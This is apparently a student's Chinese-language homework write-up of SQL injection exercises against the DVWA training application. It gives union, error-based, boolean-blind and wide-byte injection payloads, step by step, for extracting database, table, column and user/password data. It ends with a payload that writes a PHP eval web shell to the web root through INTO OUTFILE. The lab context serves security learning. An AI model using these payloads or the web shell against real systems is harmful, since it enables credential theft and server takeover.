第七周作业
一、分别在前端和后端使用联合注入实现“库名-表名-字段名-数据”的注入过程,写清楚注入步骤
1、爆库
后端sql语句:select database(); 前端:1' order by 1#,1' order by 2#,1' order by 3# 判断显示位为两位1' union select database(),1# 查询出数据库名---dvwa2、爆表--dvwa数据库
后端sql语句:select table_name from information_schema.tables where table_schema = database(); 前端:1' union select table_name,1 from information_schema.tables where table_schema = database()# 查询出dvwa数据库中有哪些表--guestbook,users3、爆字段名--dvwa数据库users表
后端sql语句:select column_name from information_schema.columns where table_schema = database() and table_name = 'users';前端:1' union select column_name,1 from information_schema.columns where table_schema = database() and table_name = 'users dvwa数据库users表中的字段名--user_id,first_name,last_name,user,password,avatar,last_login,failed_login4、数据
后端sql语句:select user,password from users;前端:1' union select user,password from users#二、分别在前端和后端使用报错注入实现“库名-表名-字段名-数据”的注入过程,写清楚注入步骤。
1、爆库
后端sql语句:select extractvalue(1,concat(0x7e,database()));前端:1' and extractvalue(1,concat(0x7e,database()))#2、爆表--dvwa数据库
1)dvwa数据库中的数据表的个数后端sql语句:select count(table_name) from information_schema.tables where table_schema = database(); select extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = database())));前端:1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = database())))#2)dvwa数据库的数据表名----guestbook,usersselect table_name from information_schema.tables where table_schema = database() limit 0,1;select extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1)));select extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 1,1)));前端:1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1)))#1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 1,1)))#3、爆字段名--dvwa数据库users表
1)字段个数---8个select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users';后端sql语句:select extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')));前端:1' and extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#2)字段名--user和password后端sql语句:select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1)));前端:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1)))#4、数据--dvwa数据库users表user和password的值
后端sql语句:select extractvalue(1,concat(0x7e,(select user from users where user_id = 1)));select extractvalue(1,concat(0x7e,(select password from users where user_id = 1)));前端:1' and extractvalue(1,concat(0x7e,(select user from users where user_id = 1)))#1' and extractvalue(1,concat(0x7e,(select password from users where user_id = 1)))#5、回答下列关于报错注入的问题:
(1)在extractvalue函数中,为什么'~'写在参数1的位置不报错,而写在参数2的位置报错?
因为extractvalue(XML_document,xpath_string)的第一个参数是string格式,代表XML文档对象的名称,是可以有'~'的,它的第二个参数虽然也是string格式,但第二个参数需满足xpath语法格式 ,代表XML文档的路径,而路径的字符串表示中是不可能有'~'的,所以'~'写在参数1的位置不报错,而写在参数2的位置会报错
(2)报错注入中,为什么要突破单引号的限制,如何突破?
突破单引号的限制是为了让‘and’逃逸出来,使‘and’在sql语句中的语义生效
按照sql语句的语法格式,在 and前面加一个单引号,使其在后端的sql语句中和前面的单引号进行闭合,在最后加一个#,表示截断注释,让后端的sql语句中最后的单引号失效,从而实现and的逃逸
(3)在报错注入过程中,为什么要进行报错,是哪种类型的报错?
当extractvalue函数的第二个参数不符合文档路径的语法,比如,出现'~'、'?'、'<'等文件路径名禁用的字符就会报错,这属于函数参数语法报错
三、任选布尔盲注或者时间盲注在前端和后端实现“库名-表名”的注入过程,写清楚注入步骤
1、猜解数据库名的长度--利用二分法
sql语句:select length(database())1' and length(database()) > 10 # missing
1' and length(database()) > 5 # missing
1' and length(database()) > 3 # exists
1' and length(database()) = 4 # exists
1' and length(database()) = 5 # missing数据库名的长度为42、猜解数据库名
sql语句:select ascii(substr(database(),1,1))1' and ascii(substr(database(),1,1)) > 126 # missing
1' and ascii(substr(database(),1,1)) > 64 # exists
1' and ascii(substr(database(),1,1)) > 96 # exists
1' and ascii(substr(database(),1,1)) > 111 # missing
1' and ascii(substr(database(),1,1)) > 103 # missing
1' and ascii(substr(database(),1,1)) > 97 # exists
1' and ascii(substr(database(),1,1)) > 100 # missing
1' and ascii(substr(database(),1,1)) = 98 # missing
1' and ascii(substr(database(),1,1)) = 99 # missing
1' and ascii(substr(database(),1,1)) = 100 # exists
数据库名第一个字符的ascii码为100,对应的字符为d1' and ascii(substr(database(),2,1)) > 126 # missing
1' and ascii(substr(database(),2,1)) > 64 # exists
1' and ascii(substr(database(),2,1)) > 98 # exists
1' and ascii(substr(database(),2,1)) > 110 # exists
1' and ascii(substr(database(),2,1)) > 118 # missing
1' and ascii(substr(database(),2,1)) > 114 # exists
1' and ascii(substr(database(),2,1)) > 116 # exists
1' and ascii(substr(database(),2,1)) = 117 # missing
1' and ascii(substr(database(),2,1)) = 118 # exists
数据库名第二个字符的ascii码为118,对应的字符为v1' and ascii(substr(database(),3,1)) > 126 # m
1' and ascii(substr(database(),3,1)) >64 # e
1' and ascii(substr(database(),3,1)) >96 # e
1' and ascii(substr(database(),3,1)) >110 # e
1' and ascii(substr(database(),3,1)) >118 # e
1' and ascii(substr(database(),3,1)) >122 # m
1' and ascii(substr(database(),3,1)) >120 # m
1' and ascii(substr(database(),3,1)) =119 # e
数据库名第三个字符的ascii码为119,对应的字符为w1' and ascii(substr(database(),4,1)) > 64 # e
1' and ascii(substr(database(),4,1)) > 96 # e
1' and ascii(substr(database(),4,1)) > 111 # m
1' and ascii(substr(database(),4,1)) > 103 # m
1' and ascii(substr(database(),4,1)) > 100 # m
1' and ascii(substr(database(),4,1)) > 98 # m
1' and ascii(substr(database(),4,1)) =97 # e
数据库名第四个字符的ascii码为97,对应的字符为a数据库名为:dvwa3、猜解dvwa数据库中的数据表的个数
sql语句:select count(table_name) from information_schema.tables where table_schema = database()1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 10# m
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 5# m
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 3# m
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 1# e
1' and (select count(table_name) from information_schema.tables where table_schema = database()) =2# edvwa数据库中的数据表的个数为:24、猜解dvea数据库中的数据表名
第一张表:
1)猜解第一张表的长度
sql语句:select length(table_name) from information_schema.tables where table_schema = database() limit 0,11' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)>10# m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)>5# e
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)>8# e
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=9# e
第一张表的长度为:92)猜解第一张表的名称
sql语句:select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,11' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112# m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105# m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 102# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 104# m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =103# e
第一张表的第一个字符的ascii码为103,对应的字符为:g1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >120# m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >116# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >118# m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =117# e
第一张表的第二个字符的ascii码为117,对应的字符为:u1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105# m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >102# m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >100# e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =101# e
第一张表的第三个字符的ascii码为101,对就的字符为:e1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >119# m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >116# m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >114# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =115# e
第一张表的第四个字符的ascii码为115,对应的字符为:s1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >120# m
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >116# m
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >114# e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =115# m
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =116# e
第一张表的第五个字符的ascii码为116,对应的字符为:t1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# m
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >81# e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >89# e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >94# e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >96# e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =97# m
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =98# e
第一张表的第六个字符的ascii码为98,对应的字符为:b1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# m
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105# e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >109# e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =110# m
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =111# e
第一张表的第七个字符的ascii码为111,对应的字符为:o1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# m
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105# e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >109# e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =110# m
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =111# e
第一张表的第八个字符的ascii码为111,对应的字符为:o1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64# e
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98# e
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112# m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105# e
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >109# m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >107# m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =106# m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =107# e
第一张表的第九个字符的ascii码为107,对就的字符为:kdvwa数据库第一张表的名称为:guestbook
第二张表:
1)猜解dvwa数据库第二张表的长度
sql语句:select length(table_name) from information_schema.tables where table_schema = database() limit 1,11' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)>10# m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)>5# m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)>3# e
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)=4# m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)=5# e
dvwa数据库第二张表的长度为:52)猜解dvwa数据库第二张表的名称
sql语句:select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,11' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 119# m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 116# e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) =117# e
第二张表的第一个字符的ascii码为:117,对应的字符为:u1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >64# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >98# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >112# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >119# m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >116# m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >114# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) =115# e
第二张表的第二个字符的ascii码为:115,对应的字符为:s1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >64# e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >98# e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >112# m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >105# m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >102# m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >100# e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) =101# e
第二张表的第三个字符的ascii码为:101,对应的字符为:e1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >64# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >98# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >112# e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >119# m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >116# m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >114# m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) =113# m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) =114# e
第二张表的第四个字符的ascii码为:114,对应的字符为:r1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >64# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >98# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >112# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >119# m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >116# m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >114# e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) =115# e
第二张表的第五个字符的ascii码为:115,对应的字符为:sdvwa数据库的第二张表的名称为:users
5、猜解dvwa数据库users表的字段数
sql语句:select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 10# m
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 5# e
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 8# m
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 7# e
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') =8# e
dvwa数据库的users表中的字段数为:86、猜解dvwa数据库users表的字段名称
获取几个包含关键信息的字段,如:用户名、密码...
【猜想】数据库中可能保存的字段名称
用户名:username/user_name/uname/u_name/user/name/...
密码:password/pass_word/pwd/pass/...
sql语句:select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'username'1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'username') = 1# m
1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'user') = 1# e
猜解出users表中的1个字段名为:user1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'password') = 1# e
猜解出users表中的1个字段名为:passworddvwa数据库users表中的两个字段名为:user,password
7、猜解users表中user和password的字段值
user字段的字段值
1)user字段的值的个数----5个
sql语句:select count(user) from users1' and (select count(user) from users) >10# m
1' and (select count(user) from users) >5# m
1' and (select count(user) from users) >3# e
........2)猜解user字段第一个字段值的长度----5
sql语句:select length(user) from users limit 0,11' and (select length(user) from users limit 0,1) > 10# m
.......3)猜解user字段第一个字段值---admin
sql语句:select ascii(substr(user,1,1)) from users limit 0,1;1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 64 # e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 98 # m
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 88 # e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 94 # e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 96 # e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) = 97 # e
user第一个字段的值为:a........
user第二个字段的值为:d
user第三个字段的值为:m
user第四个字段的值为:i
user第五个字段的值为:n4)猜user字段第二/三/四/五个字段值
。。。。。。password字段的字段值
同猜解user字段的字段值四、利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤
1、爆库
lili%df' union select database(),version()#
2、爆表
sql语句:select table_name from information_schema.tables where table_schema = database()lili%df' union select 1,table_name from information_schema.tables where table_schema = database()# 
3、爆字段--users表
4、下载数据--users表中的username和password
sql语句:select username,password from userslili%df' union select username,password from users#
五、利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤
#使用into outfile 写入一句话木马,文件名为shell2.php1' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.php' # 
使用蚁剑工具连接
使用Hackbar来连接shell2.php
相关文章:
第七周作业
一、分别在前端和后端使用联合注入实现“库名-表名-字段名-数据”的注入过程,写清楚注入步骤 1、爆库 后端sql语句:select database(); 前端:1 order by 1#,1 order by 2#,1 order by 3# 判断显示位为两位1 union sel…...
Linux 进程信号详解
进程信号 信号是进程之间事件异步通知的一种方式,属于软中断。 kill -l //查看不同信号代表的事件 执行kill -l 可以看到共有62种信号,其中: 0-31号信号为非可靠信号(这部分信号借鉴于UNIX系统的信号);…...
MCP 应用案例-网络设备批量管理
案例背景 需求痛点 企业需管理数百台跨地域网络设备(交换机/路由器),传统方式存在: 人工SSH登录效率低脚本维护成本高(不同厂商CLI语法差异)状态监控依赖独立监控系统 解决方案 通过MCP协议构建智能网络…...
进程程序替换
fork() 之后,⽗⼦各⾃执⾏⽗进程代码的⼀部分如果⼦进程就想执⾏⼀个全新的程序呢?进程的程序 替换来完成这个功能! 程序替换是通过特定的接⼝,加载磁盘上的⼀个全新的程序(代码和数据),加载到调⽤进程的地址空间中!…...
6.7 ChatGPT自动生成定时任务脚本:Python与Cron双方案实战指南
ChatGPT自动生成定时任务脚本:Python与Cron双方案实战指南 关键词:定时任务调度, ChatGPT 代码生成, Cron 脚本开发, Python 调度器, 自动化更新系统 6.3 使用 ChatGPT 生成 Cron 调度脚本 在 GitHub Sentinel 的定期更新功能中,定时任务调度是核心模块。本节演示如何通过…...
废物九重境弱者学JS第十四天--构造函数以及常用的方法
目录 JavaScript 进阶 - 第2天 深入对象 构造函数 实例成员 静态成员 内置构造函数 Object Array 包装类型 String Number 案例 JavaScript 进阶 - 第2天 了解面向对象编程的基础概念及构造函数的作用,体会 JavaScript 一切皆对象的语言特征,…...
机器学习+深度学习
文章目录 一、机器学习(一)机器学习概念(二)机器学习基本流程(三)机器学习应用场景二、机器学习的常见工具与相关库(一)Python 机器学习库(二)数据处理库(三)可视化库三、聚类算法思想与模型搭建过程(一)K - Means 聚类算法(二)DBSCAN 聚类算法四、分类算法思想…...
docker基本使用命令
一、镜像 1、拉取镜像 docker pull busybox docker pull nginx:1.26-alpine 2、查看本地镜像 [rootRocky-1 ~]# docker images REPOSITORY TAG IMAGE ID CREATED SIZE nginx latest 4e1b6bae1e48 18 hours ago 192MB busybox lates…...
相机模型--CMOS和CCD的区别
1--CMOS和CCD的工作原理 CCD(Charge Coupled Device,电荷耦合器件): 1. 图像通过光电效应在感光单元中转化为电荷; 2. 每个像素上的电荷被依次“耦合”并传输到芯片的角落,通过一个或几个模拟输出放大器输…...
)
触发器(详解)
一:MySQL触发器 MySQL数据库中触发器是一个特殊的存储过程。 不同的是执行存储过程要使用 CALL 语句来调用,而触发器的执行不需要使用 CALL 语句来调用,也不需要手工启动,只要一个预定义的事件发生就会被 MySQL自动调用。 引发…...
的数据)
Vue 3 中将 ref 创建的响应式对象数据转换为普通(非响应式)的数据
Vue 3 中使用 ref 创建的响应式对象数据转换为普通(非响应式)的数据,有以下几种方法: 1. 访问 .value 属性: 这是最直接、最常见的方法。 由于 ref 对象的值存储在其 .value 属性中,直接访问该属性即可获得普通数据。…...
_键盘事件)
Vue基础(6)_键盘事件
普通键盘事件 键盘事件常用的有两个:keydown、keyup。 举例: <!DOCTYPE html> <html lang"zh"> <head><meta charset"UTF-8"><script type"text/javascript" src"../js/vue.js"&…...
Kubernetes控制平面组件:高可用 APIServer
云原生学习路线导航页(持续更新中) kubernetes学习系列快捷链接 Kubernetes架构原则和对象设计(一)Kubernetes架构原则和对象设计(二)Kubernetes架构原则和对象设计(三)Kubernetes控…...
这个是我的qss按钮样式 和之前的// 应用全局样式表 QString style = R“(是会冲突吗,导致我的按钮背景颜色是黑色,我该怎么修改
/* 样式 A */ *[style-type="A"] { background-color:#cfd1d4; border: none; border-radius: 50%; /* 圆形边框 */ padding: 7px 14px; } *[style-type="A"]:hover { background-color: #45a049; }这个是我的qss按钮样式 和之前的// 应用全局样式表 QStri…...
)
Kubernetes控制平面组件:API Server详解(二)
云原生学习路线导航页(持续更新中) kubernetes学习系列快捷链接 Kubernetes架构原则和对象设计(一)Kubernetes架构原则和对象设计(二)Kubernetes架构原则和对象设计(三)Kubernetes控…...
人工智能在智慧农业中的应用:从田间到餐桌的变革
农业是人类社会的基石,随着全球人口的增长和资源的日益紧张,传统农业面临着巨大的挑战。近年来,人工智能(AI)技术的快速发展为农业带来了新的机遇。智慧农业通过将AI技术与农业生产相结合,实现了从田间种植…...
多人3D游戏完整实现方案
以下是一份完整的代码实现方案,涵盖架构设计、核心模块实现和部署流程。我们以 多人3D游戏 为例,结合之前讨论的Nano服务端框架和Unity客户端: 技术栈 模块技术选型服务端Golang + Nano框架 + MongoDB客户端Unity 2022 + C# + Mirror Networking通信协议Protobuf + WebSock…...
FFUF指南
ffuf 的核心功能: 目录/文件发现: 通过暴力破解(使用字典)探测目标网站的隐藏目录或文件,例如: ffuf -w /path/to/wordlist.txt -u http://target.com/FUZZ 子域名枚举: 通过模糊测试发现目标…...
详细的PyCharm安装教程
详细的PyCharm安装教程 安装前准备 确认系统要求: Windows:Microsoft Windows 10 1809 64位或更高版本,Windows Server 2019 64位或更高版本。 macOS:12.0或更高版本。 Linux:满足以下要求的两个最新版本的Ubuntu LTS或…...
FPGA IO引脚 K7-认知4
UG475来知道bank, GTX, Pin数量, Package, Pinout 时钟 SRCC(Single-Region Clock Capable I/O)和MRCC(Multi-Region Clock Capable I/O)是专用的时钟输入/输出引脚。 如 2.DQS...
C++——异常
1. C语言错误处理机制 我们在曾经介绍过C语言下的错误码。错误码我们过去经常见到,错误码通常是指errno变量中的值,它表示特定操作(如系统调用或库函数)发生错误的原因。errno是一个全局变量,当出现错误时会自动将错误…...
vue3 中 iframe 多页面切换导致资源刷新的问题解决
最近发现一个问题,我在使用 websocket 的时候,在主页面进行了 websocket 连接了之后,再使用 iframe 打开子页面的时候,通常会触发页面刷新,这样就导致 WebSocket 断开,这是因为切换 src 会重新加载 iframe …...
php多种方法实现xss过滤
1. 使用 htmlspecialchars() 函数 htmlspecialchars() 是一个PHP内置函数,用于将特殊字符转换为HTML实体,从而防止浏览器将其解释为HTML或脚本代码。 <?phpfunction sanitizeInput($input) {// 将特殊字符转换为HTML实体return htmlspecialchars($…...
蓝桥杯练习题2
动态规划 动态规划三大题型:计数问题、最值问题、存在性问题; 【最小权值】-- 最值问题 【题目分析】 import java.util.Arrays; Arrays类中的一个方法:Arrays.fill(int[] m,int n) //给 int 类型(或者char类型/Long类型...)的数组全部空间…...
Python遥感开发之Hurst指数的实现
Python遥感开发之Hurst指数的实现 主要讲解Python实现Hurst指数,实现遥感下的Hurst指数,对Hurst指数进行分类,以及结合slope指数实现对未来变化趋势的分析。 文章目录 Python遥感开发之Hurst指数的实现0 什么是Hurst指数1 Python实现Hurst指…...
opencv 给图片和视频添加水印
给图片和视频添加水印 1 给图片添加水印2 给视频添加水印 1 给图片添加水印 代码如下: 添加水印 imgcv2.imread(r../15day4.10/src/xiaoren.png) img2cv2.imread(r../15day4.10/src/bg.png) h,w,cimg.shapeRIO_img2img2[100:100h,200:200w]img3cv2.cvtColor(img,…...
)
国网B接口协议图像数据上报通知接口流程详解以及上报失败原因(电网B接口)
文章目录 一、B接口协议图像数据上报通知接口介绍B.13.1 接口描述B.13.2 接口流程B.13.3 接口参数B.13.3.1 SIP头字段B.13.3.2 SIP响应码B.13.3.3 XML Schema参数定义 B.13.4 消息示例B.13.4.1 图像数据上报请求B.13.4.2 图像数据上报响应 二、B接口图像数据上报通知失败常见问…...
)
Redis(持久化)
目录 一 Redis持久化的方式 1. RDB(Redis Database) 2. AOF(Append Only File) 二 对比RDB/AOF 为什么要持久化 Redis是跑在内存上的,但内存上的数据是临时的,Redis服务挂了,数据也就丢失了,所以为了解决上述问题,R…...
Linux系统中的网络管理
